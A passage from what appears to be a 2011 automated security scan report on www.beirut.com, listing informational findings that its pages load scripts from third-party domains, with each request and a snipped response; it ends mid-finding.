Content-Type: text/html; charset=UTF-8
Content-Length: 68472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.714. http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:01:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.715. http://www.beirut.com/ThingsToDo/Parties/1690334 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Parties/1690334

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Parties/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.716. http://www.beirut.com/ThingsToDo/Performances/112730726 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Performances/112730726

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Performances/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.717. http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:09:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.718. http://www.beirut.com/ThingsToDo/Screenings/60463877 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Screenings/60463877

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Screenings/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.719. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Seminars-and-Lectures/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.720. http://www.beirut.com/ThingsToDo/Theater/706796009 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Theater/706796009

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Theater/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.721. http://www.beirut.com/ThingsToDo/ThisWeek previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/ThisWeek

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/ThisWeek HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.722. http://www.beirut.com/ThingsToDo/Today previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Today

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Today HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.723. http://www.beirut.com/ThingsToDo/Workshops/7278901598 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Workshops/7278901598

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Workshops/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.724. http://www.beirut.com/Venues/15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Venues/15

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Venues/15 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.725. http://www.beirut.com/chat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/chat

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /chat HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

